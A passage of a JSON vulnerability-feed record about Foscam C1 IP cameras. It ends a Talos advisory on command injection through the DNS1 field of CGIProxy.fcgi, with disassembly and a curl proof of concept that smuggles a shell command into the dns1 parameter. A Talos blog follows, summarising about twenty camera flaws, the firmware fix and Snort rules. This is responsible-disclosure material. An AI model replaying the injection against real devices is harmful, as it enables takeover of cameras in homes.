R0, R4\n .text:00042E00 BE FE FF EB BL sub_42900 ; [22]\n .text:00042E04 00 50 A0 E1 MOV R5, R0\n .text:00042E08 04 00 9F E5 LDR R0, =0xF4240\n .text:00042E0C 51 3D FF EB BL usleep\n .text:00042E10 F5 FF FF EA B loc_42DEC ; loop\n \n\n`sub_42900` is the function that actually checks for the value of the global variable at 0x8822c [23]. 
As soon as its value is not 0, the function `sub_428E0` is called.\n \n \n .text:00042D4C 88 30 9F E5 LDR R3, =0x24A4\n .text:00042D50 03 20 D4 E7 LDRB R2, [R4,R3] ; [23]\n .text:00042D54 00 00 52 E3 CMP R2, #0\n .text:00042D58 04 00 00 0A BEQ loc_42D70\n .text:00042D5C 00 20 A0 E3 MOV R2, #0\n .text:00042D60 03 20 C4 E7 STRB R2, [R4,R3]\n .text:00042D64 04 00 A0 E1 MOV R0, R4\n .text:00042D68 05 10 A0 E1 MOV R1, R5\n .text:00042D6C DB FE FF EB BL sub_428E0\n \n\nAt this point the execution will continue through many different calls; from a higher-level perspective, the following is the path that will be taken, stripped to only the interesting stubs (capital names are user-controlled strings):\n \n \n ```\n sub_428E0\n sub_3FB2C\n sub_3B94C\n system(\"ifconfig eth0 0.0.0.0\")\n system(\"ifconfig ra0 up\")\n sub_3B8F0\n sub_3A95C\n system(\"rm -rf /var/run/wpa_supplicant\")\n system(\"ifconfig ra0 down\")\n system(\"killall wpa_supplicant\")\n sub_3B804\n system(\"ifconfig ra0 up\")\n sub_4286C\n sub_3E164\n system(\"ifconfig ra0 0.0.0.0\")\n system(\"ifconfig ra0 down\")\n sub_3D880\n system(\"killall udhcpc\")\n fork()\n child: execlp(\"ifconfig\", \"ifconfig\", \"eth0\", IP, \"netmask\", NETMASK)\n fork()\n child: execlp(\"sh\", \"sh\", \"-c\", \"route del default dev eth0\")\n fork()\n child: execlp(\"sh\", \"sh\", \"-c\", \"route add default gw GATEWAY dev eth0\")\n fork()\n child: execlp(\"sh\", \"sh\", \"-c\", \"echo nameserver DNS1 > /etc/resolv.conf\")\n fork()\n child: execlp(\"sh\", \"sh\", \"-c\", \"echo nameserver DNS2 >> /etc/resolv.conf\")\n system(\"killall -9 OnvifAgent\")\n ```\n \n\nFunction `sub_3E164` fetches the parameters from a global structure and passes them to `sub_3D880`. Function `sub_3D880` was already called before, but this time the global state is different. The function thus takes a different branch and the actual interface configuration takes place. User-supplied parameters are taken unmodified from a global structure. 
In this function the dns1 parameter [24] is never sanitized and is used in a `sprintf` [25] call to build the final command that will be passed to `execlp` [26].\n \n \n .text:0003DF90 B4 11 9F E5 LDR R1, =str.echonameservers1 ; \"echo nameserver %s > /etc/resolv.conf\"\n .text:0003DF94 10 20 95 E5 LDR R2, [R5,#0x10] ; [24]\n .text:0003DF98 04 00 A0 E1 MOV R0, R4\n .text:0003DF9C 66 53 FF EB BL sprintf ; [25]\n .text:0003DFA0 A4 53 FF EB BL fork\n .text:0003DFA4 00 30 50 E2 SUBS R3, R0, #0\n .text:0003DFA8 0C 00 00 1A BNE loc_3DFE0\n .text:0003DFAC 88 01 9F E5 LDR R0, =str.sh ; \"sh\"\n .text:0003DFB0 00 30 8D E5 STR R3, [SP,#0xD8+var_D8]\n .text:0003DFB4 00 10 A0 E1 MOV R1, R0\n .text:0003DFB8 80 21 9F E5 LDR R2, =str._c ; \"-c\"\n .text:0003DFBC 04 30 A0 E1 MOV R3, R4 ; [26]\n .text:0003DFC0 CC 53 FF EB BL execlp\n \n\n### Exploit Proof-of-Concept\n\nThis vulnerability is reachable through the \"setIpInfo\" command and requires a valid user account with administrator privileges. The following proof of concept shows how to execute an arbitrary command.\n \n \n ```\n $ sUsr=\"admin\"\n $ sPwd=\"\"\n $ sIP=192.168.0.20\n $ sMask=255.255.255.0\n $ sGW=192.168.0.1\n $ sDns1=1.1.1.1\n $ sDns2=2.2.2.2\n $ sCmd=`perl -MURI::Escape -e 'print uri_escape(\";id>/tmp/www/inj;\")'`\n $ curl \"http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=guest&pwd=asd0--&cmd=setIpInfo&isDHCP=0&ip=${sIP}&mask=${sMask}&gate=${sGW}&dns1=${sDns1}${sCmd}&dns2=${sDns2}\"\n ```\n \n\n### Timeline\n\n2017-05-30 - Vendor Disclosure \n2017-06-19 - Public Release\n\n##### Credit\n\nDiscovered by Claudio Bozzato of Cisco Talos.\n", "modified": "2017-06-19T00:00:00", "published": "2017-06-19T00:00:00", "id": "TALOS-2017-0349", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0349", "title": "Foscam IP Video Camera CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability", 
"type": "talos", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2017-07-29T13:22:40", "bulletinFamily": "blog", "description": "<h2 id=\"h.4x9n64h9k27j\">Executive Summary</h2>The Foscam C1 is a webcam that is marketed for use in a variety of applications including home security monitoring. As an indoor webcam, it is designed to be set up inside of a building and features the ability to be accessed remotely via a web interface or from within a mobile application. Talos recently identified several vulnerabilities in the Foscam C1 camera that could be used by attackers for a variety of purposes including access and retrieval of sensitive information stored on the camera, execution of arbitrary commands within the camera's operating system, and in several cases, completely compromise the device. As these cameras are commonly deployed in sensitive locations and used as baby monitors, security cameras, etc. it is recommended that affected devices be updated as quickly as possible to ensure that they are no longer vulnerable.<br /><br />In accordance with our responsible disclosure policy, Talos has worked with Foscam to resolve these issues, which has resulted in the release of a firmware update addressing them.<br /><br /><h2 id=\"h.om6cexyys78v\">Vulnerability Details</h2><div><a name='more'></a><br /></div><b>Foscam C1 Webcam FTP Hard Coded Password Vulnerability (TALOS-2016-0245 / CVE-2016-8731)</b><br /><br /><i>Vulnerability Discovered by Richard Harman and Dave McDaniel of Talos</i><br /><br />Talos recently discovered that Foscam C1 Indoor HD Cameras contain undocumented, hardcoded FTP credentials that could allow an attacker the ability to remotely login to affected devices and gain full read and write access to the Micro-SD card mounted within the device. This access could be used to obtain sensitive information such as audio and video recordings, images, and other data stored on the Micro-SD card. 
This vulnerability, TALOS-2016-0245 has been assigned CVE-2016-8731. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2016-0245/\">here</a>.<br /><br /><b>Foscam IP Video Camera WebService CGI Parameter Code Execution Vulnerability (TALOS-2017-0299 / CVE-2017-2805)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a stack based buffer overflow in the \"CGIProxy.fcgi\" service of the web management interface. An attacker could use a specially crafted HTTP request to trigger this overflow condition. This vulnerability could be leveraged by an attacker to achieve code execution on vulnerable devices. This vulnerability, TALOS-2017-0299 has been assigned CVE-2017-2805. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0299/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Account Creation Command Injection Vulnerability (TALOS-2017-0328 / CVE-2017-2827)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service of the web management interface. An attacker could insert arbitrary characters into the \"addAccount\" command via either the \"usrName\" or \"usrPwd\" parameters, resulting in execution of arbitrary OS commands. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. This vulnerability, TALOS-2017-0328 has been assigned CVE-2017-2827. 
For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0328/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Account Password Command Injection Vulnerability (TALOS-2017-0329 / CVE-2017-2828)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service of the web management interface. An attacker could insert arbitrary characters into the \"changePassword\" command during the account password change process, resulting in execution of arbitrary OS commands. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. TALOS-2017-0329 has been assigned CVE-2017-2828. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0329/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Message 0x3001 Directory Traversal Vulnerability (TALOS-2017-0330 / CVE-2017-2829)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a directory traversal vulnerability present in the \"CGIProxy.fcgi\" service of the web management interface. This vulnerability could allow an attacker to retrieve arbitrary files from the camera using an HTTP request. This could result in the disclosure of sensitive information. This vulnerability is due to a failure to adequately sanitize user input and could allow an attacker to traverse outside of the intended directory structure of the web interface. TALOS-2017-0330 has been assigned CVE-2017-2829. 
For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0330/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Message 0x3001 Multi-part Form Boundary Code Execution Vulnerability (TALOS-2017-0331 / CVE-2017-2830)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a buffer overflow vulnerability present in the \"CGIProxy.fcgi\" service of the web management interface. Exploitation of this vulnerability could result in the execution of arbitrary code on affected devices. An attacker could trigger this vulnerability using a specially crafted HTTP request to overwrite the buffer on the stack and ultimately obtain control over code execution flow within the device. This vulnerability is due to a failure of the device to perform proper bounds checking on input received from users. TALOS-2017-0331 has been assigned CVE-2017-2830. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0331/\">here</a>. <br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Query Append Code Execution Vulnerability (TALOS-2017-0332 / CVE-2017-2831)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a buffer overflow vulnerability present in the \"FCGX_Init\" function within the \"CGIProxy.fcgi\" service of the web management interface. An attacker could leverage this vulnerability to obtain remote code execution on affected devices. This vulnerability could be triggered using a specially crafted HTTP request and allow an attacker to overwrite the buffer or obtain control over code execution flow within affected devices. TALOS-2017-0332 has been assigned CVE-2017-2831. 
For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0332/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi FTP Startup Configuration Command Injection Vulnerability (TALOS-2017-0334 / CVE-2017-2833)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present within the \"webService\" application that is launched by the device during the bootup process. An attacker could leverage this vulnerability to execute operating system commands on the device during device startup. This vulnerability can be exploited using any command that allows for changing an account password (e.g. changePassword). During startup the FTP service is configured using shell commands without sanitizing the password parameter, resulting in execution of the attacker-supplied commands. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. The injected command would then be executed once the device reboots. TALOS-2017-0334 has been assigned CVE-2017-2833. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0334/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Account Deletion Command Injection Vulnerability (TALOS-2017-0335 / CVE-2017-2832)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands during the Account Deletion process within the web interface. 
An attacker could exploit this vulnerability using a specially crafted HTTP request. The vulnerability is triggered when the \"delAccount\" command is invoked. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. TALOS-2017-0335 has been assigned CVE-2017-2832. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0335/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi SMTP Test Host Parameter Configuration Command Injection Vulnerability (TALOS-2017-0343 / CVE-2017-2841)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the \"msmtprc\" configuration file on the device, resulting in execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the \"smtpTest\" command and injecting commands into the \"SMTP Test Host\" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0343 has been assigned CVE-2017-2841. 
For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0343/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi SMTP Test User Parameter Configuration Command Injection Vulnerability (TALOS-2017-0344 / CVE-2017-2842)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the \"msmtprc\" configuration file on the device, resulting in the execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the \"smtpTest\" command and injecting commands into the \"SMTP Test User\" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0344 has been assigned CVE-2017-2842. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0344/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi SMTP Test Password Parameter Configuration Command Injection Vulnerability (TALOS-2017-0345 / CVE-2017-2843)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the \"msmtprc\" configuration file on the device, resulting in the execution of the injected commands. 
An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the \"smtpTest\" command and injecting commands into the \"SMTP Test Password\" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0345 has been assigned CVE-2017-2843. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0345/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi SMTP Test Sender Parameter Configuration Command Injection Vulnerability (TALOS-2017-0346 / CVE-2017-2844)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the \"msmtprc\" configuration file on the device, resulting in the execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the \"smtpTest\" command and injecting commands into the \"SMTP Test Sender\" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0346 has been assigned CVE-2017-2844. 
For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0346/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi SMTP Test Command Injection Vulnerability (TALOS-2017-0347 / CVE-2017-2845)</b><br /><br /><i>Vulnerability Discovered by Cory Duplantis and Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands during the SMTP configuration testing process. This vulnerability can be reached by invoking the \"smtpTest\" command and injecting attacker-specified operating system commands. A specially crafted HTTP request can be used to exploit this vulnerability. This vulnerability requires an attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0347 has been assigned CVE-2017-2845. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0347/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Gateway Address Configuration Command Injection Vulnerability (TALOS-2017-0348 / CVE-2017-2846)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with manual networking configuration. This vulnerability can be reached by invoking the \"setIpInfo\" command and injecting commands into the \"Gateway Address\" parameter. 
This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0348 has been assigned CVE-2017-2846. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0348/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability (TALOS-2017-0349 / CVE-2017-2847)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with manual networking configuration. This vulnerability can be reached by invoking the \"setIpInfo\" command and injecting commands into the \"DNS1\" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0349 has been assigned CVE-2017-2847. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0349/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi DNS2 Address Configuration Command Injection Vulnerability (TALOS-2017-0350 / CVE-2017-2848)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with manual networking configuration. 
This vulnerability can be reached by invoking the \"setIpInfo\" command and injecting commands into the \"DNS2\" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0350 has been assigned CVE-2017-2848. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0350/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi NTP Server Configuration Command Injection Vulnerability (TALOS-2017-0351 / CVE-2017-2849)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with NTP server address configuration. This vulnerability can be reached by invoking the \"setSystemTime\" command and injecting commands into the \"ntpServer\" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0351 has been assigned CVE-2017-2849. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0351/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Change Username pureftpd.passwd Injection Vulnerability (TALOS-2017-0352 / CVE-2017-2850)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to an injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. 
This vulnerability could allow an attacker to inject arbitrary operating system commands into the \"pureftpd.passwd\" configuration file on the device during a username change operation, enabling the attacker to break out of the chroot environment associated with the FTP service on the device. This vulnerability could be used to escalate privileges on affected devices. This vulnerability is reachable by invoking the \"changeUserName\" command and requires an attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0352 has been assigned CVE-2017-2850. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0352/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Wifi Settings Code Execution Vulnerability (TALOS-2017-0353 / CVE-2017-2851)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a stack-based buffer overflow vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability can be exploited using a specially crafted HTTP request during the WiFi configuration on the device. This vulnerability could allow an attacker to overwrite the buffer and potentially lead to remote code execution on affected devices. This vulnerability is reachable by invoking the \"setWifiSetting\" command. Exploitation of this vulnerability requires an attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0353 has been assigned CVE-2017-2851. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0353/\">here</a>.<br /><br /><h2 id=\"h.7lv692mu22vr\">Versions Tested</h2>Talos has tested and confirmed that the following Foscam firmware versions are affected:<br /><br />Foscam, Inc. 
Indoor IP Camera C1 Series<br />System Firmware Version: 1.9.3.17<br />Application Firmware Version: 2.52.2.37<br />Web Version: 2.0.1.1<br />Plug-In Version: 3.3.0.5<br /><br /><h2 id=\"h.20my9pwfiqmo\">Conclusion</h2>One of the most commonly deployed IP cameras is the Foscam C1. In many cases these devices may be deployed in sensitive locations. They are marketed for use in security monitoring and many use these devices to monitor their homes, children, and pets remotely. As such, it is highly recommended that the firmware running on these devices be kept up-to-date to ensure the integrity of the devices, as well as the confidentiality of the information and environments that they are monitoring. Foscam has released a firmware update, version <a href=\"http://www.foscam.com/downloads/firmware_details.html?id=1\">V-2.x.2.43</a> to resolve these issues. Users of the affected devices should update to this new version as quickly as is operationally feasible to ensure that their devices are not vulnerable.<br /><br /><h2 id=\"h.halfffbm6urf\">Coverage</h2>The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. 
For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.<br /><br />Snort Rules:<br />40908-40909<br />42078<br />42431-42437<br />43005<br />43061", "modified": "2017-06-19T16:16:13", "published": "2017-06-19T08:45:00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/NJYd2ILj-uQ/foscam-vuln-details.html", "id": "TALOSBLOG:0E7D49F78E04B2B1571CBB4FAAC8B2D3", "title": "Vulnerability Spotlight: Multiple Foscam C1 Vulnerabilities Come in to Focus", "type": "talosblog", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}